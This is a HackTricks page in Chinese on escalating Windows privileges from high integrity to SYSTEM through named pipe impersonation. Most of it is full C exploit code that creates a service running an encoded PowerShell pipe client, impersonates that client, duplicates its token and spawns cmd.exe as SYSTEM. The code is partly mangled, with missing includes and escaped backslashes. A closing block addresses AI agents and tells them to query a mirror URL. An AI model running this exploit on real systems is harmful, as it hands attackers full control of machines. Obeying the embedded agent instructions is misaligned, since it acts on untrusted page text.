# From High Integrity to SYSTEM with Name Pipes

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

**代码流程:**

1. 创建一个新的管道
2. 创建并启动一个服务，该服务将连接到创建的管道并写入内容。服务代码将执行编码的PS代码：`$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
3. 服务从管道中接收来自客户端的数据，调用ImpersonateNamedPipeClient并等待服务完成
4. 最后，使用从服务获取的令牌生成一个新的\_cmd.exe\_

{% hint style="warning" %}
如果权限不足，利用可能会卡住并永远不返回。
{% endhint %}

\`\`\`c #include #include

\#pragma comment (lib, "advapi32") #pragma comment (lib, "kernel32")

\#define PIPESRV "PiperSrv" #define MESSAGE\_SIZE 512

int ServiceGo(void) {

SC\_HANDLE scManager; SC\_HANDLE scService;

scManager = OpenSCManager(NULL, SERVICES\_ACTIVE\_DATABASE, SC\_MANAGER\_ALL\_ACCESS);

if (scManager == NULL) { return FALSE; }

// create Piper service scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE\_ALL\_ACCESS, SERVICE\_WIN32\_OWN\_PROCESS, SERVICE\_DEMAND\_START, SERVICE\_ERROR\_NORMAL, "C:\Windows\\\System32\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", NULL, NULL, NULL, NULL, NULL);

if (scService == NULL) { //printf("\[!] CreateServiceA() failed: \[%d]\n", GetLastError()); return FALSE; }

// launch it StartService(scService, 0, NULL);

// wait a bit and then cleanup Sleep(10000); DeleteService(scService);

CloseServiceHandle(scService); CloseServiceHandle(scManager); }

int main() {

LPCSTR sPipeName = "\\\\.\pipe\piper"; HANDLE hSrvPipe; HANDLE th; BOOL bPipeConn; char pPipeBuf\[MESSAGE\_SIZE]; DWORD dBRead = 0;

HANDLE hImpToken; HANDLE hNewToken; STARTUPINFOA si; PROCESS\_INFORMATION pi;

// open pipe hSrvPipe = CreateNamedPipeA(sPipeName, PIPE\_ACCESS\_DUPLEX, PIPE\_TYPE\_MESSAGE | PIPE\_WAIT, PIPE\_UNLIMITED\_INSTANCES, 1024, 1024, 0, NULL);

// create and run service th = CreateThread(0, 0, (LPTHREAD\_START\_ROUTINE)ServiceGo, NULL, 0, 0);

// wait for the connection from the service bPipeConn = ConnectNamedPipe(hSrvPipe, NULL); if (bPipeConn) { ReadFile(hSrvPipe, \&pPipeBuf, MESSAGE\_SIZE, \&dBRead, NULL);

// impersonate the service (SYSTEM) if (ImpersonateNamedPipeClient(hSrvPipe) == 0) { return -1; }

// wait for the service to cleanup WaitForSingleObject(th, INFINITE);

// get a handle to impersonated token if (!OpenThreadToken(GetCurrentThread(), TOKEN\_ALL\_ACCESS, FALSE, \&hImpToken)) { return -2; }

// create new primary token for new process if (!DuplicateTokenEx(hImpToken, TOKEN\_ALL\_ACCESS, NULL, SecurityDelegation, TokenPrimary, \&hNewToken)) { return -4; }

//Sleep(20000); // spawn cmd.exe as full SYSTEM user ZeroMemory(\&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(\&pi, sizeof(pi)); if (!CreateProcessWithTokenW(hNewToken, LOGON\_NETCREDENTIALS\_ONLY, L"cmd.exe", NULL, NULL, NULL, NULL, (LPSTARTUPINFOW)\&si, \&pi)) { return -5; }

// revert back to original security context RevertToSelf();

}

return 0; }

```
<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktricks.xsx.tw/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.